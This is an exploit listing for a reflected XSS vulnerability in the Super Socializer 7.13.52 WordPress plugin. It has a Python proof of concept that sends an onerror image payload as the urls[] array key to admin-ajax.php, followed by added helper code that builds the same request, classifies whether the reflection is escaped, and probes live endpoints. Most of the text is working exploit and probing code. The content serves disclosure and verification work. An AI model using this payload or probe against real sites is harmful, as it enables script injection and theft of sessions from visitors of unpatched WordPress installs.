Super Socializer 7.13.52 Reflected XSS Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2023-06-20 | Type: webapps | Platform: php
This exploit / vulnerability (Super Socializer 7.13.52 reflected XSS) is published for educational purposes only; if you use it, you do so at your own risk!
import requests

# The URL of the vulnerable WordPress AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# The XSS payload. It is sent as the *key* of the urls[] array parameter,
# which the plugin's the_champ_sharing_count handler reflects without
# sanitizing or escaping it.
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The POST body that triggers the vulnerability: the AJAX action plus a
# urls[<payload>] entry (PHP parses this into $_POST['urls'][<payload>]).
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check whether the payload is reflected verbatim (unescaped) in the response.
# An escaped reflection (&lt;img ...&gt;) would not match and indicates the output is encoded.
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")
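The substring check above only tells you whether the payload came back byte-for-byte. A practitioner verifying this class of bug usually wants two more things: to know whether a reflection is actually escaped (which is what the fix for reflected XSS looks like: `&lt;img ...&gt;` instead of `<img ...>`), and to know whether the response is served as HTML at all, since a verbatim reflection inside an `application/json` body is not rendered as markup by the browser. The following is an added example, not code from the original post or from the Super Socializer plugin. It reuses the same action name, parameter layout and payload as the exploit above; the sample responses are constructed for illustration and are not captured from the plugin. The `probe()` helper performs the live request and is the only part that needs network access.

```python
import html

# Same payload the exploit above sends; used here as the reflection marker.
XSS_PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def build_post_body(payload: str,
                    action: str = "the_champ_sharing_count",
                    target: str = "https://www.google.com") -> dict:
    """POST body for admin-ajax.php with the payload as the urls[] array key.

    PHP parses urls[<key>]=<value> into $_POST['urls'][<key>], so the key,
    not the value, is what an unescaping handler echoes back.
    """
    return {"action": action, f"urls[{payload}]": target}


def classify_reflection(body: str, content_type: str,
                        payload: str = XSS_PAYLOAD) -> str:
    """Classify how an HTTP response reflects the payload.

    Returns one of:
      'exploitable'    payload appears verbatim in a response served as text/html
      'raw-nonhtml'    payload appears verbatim, but the body is not HTML
                       (e.g. application/json); the browser will not render it
                       as markup, so it is only a problem if a client injects it
                       into the DOM unescaped
      'escaped'        payload appears only as HTML entities (&lt;img ...&gt;),
                       i.e. output escaping is in place
      'not-reflected'  the payload does not appear in any form
    """
    media_type = content_type.split(";")[0].strip().lower()
    if payload in body:
        return "exploitable" if media_type == "text/html" else "raw-nonhtml"
    if html.escape(payload) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "not-reflected"


# Constructed sample responses (not captured from the plugin) covering each case.
SAMPLE_RESPONSES = {
    "unpatched": ("text/html; charset=UTF-8",
                  "<p>" + XSS_PAYLOAD + "</p>"),
    "patched":   ("text/html; charset=UTF-8",
                  "<p>" + html.escape(XSS_PAYLOAD) + "</p>"),
    "json_api":  ("application/json; charset=UTF-8",
                  '{"' + XSS_PAYLOAD + '":0}'),
    "silent":    ("text/html; charset=UTF-8", "0"),
}


def run_samples() -> dict:
    """Classify every constructed sample; returns {name: classification}."""
    return {name: classify_reflection(body, ctype)
            for name, (ctype, body) in SAMPLE_RESPONSES.items()}


def probe(url: str, payload: str = XSS_PAYLOAD, timeout: float = 10.0) -> str:
    """Send the live request (assumes the requests library is installed and
    that url points at a WordPress admin-ajax.php endpoint) and classify it."""
    import requests  # imported here so the offline helpers above need no extra deps
    resp = requests.post(url, data=build_post_body(payload), timeout=timeout)
    return classify_reflection(resp.text, resp.headers.get("Content-Type", ""), payload)


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:10s} -> {verdict}")
```

Run `probe("https://example.com/wp-admin/admin-ajax.php")` against a host you are authorised to test; anything other than `'exploitable'` means the naive substring check in the exploit would have been misleading in one direction or the other.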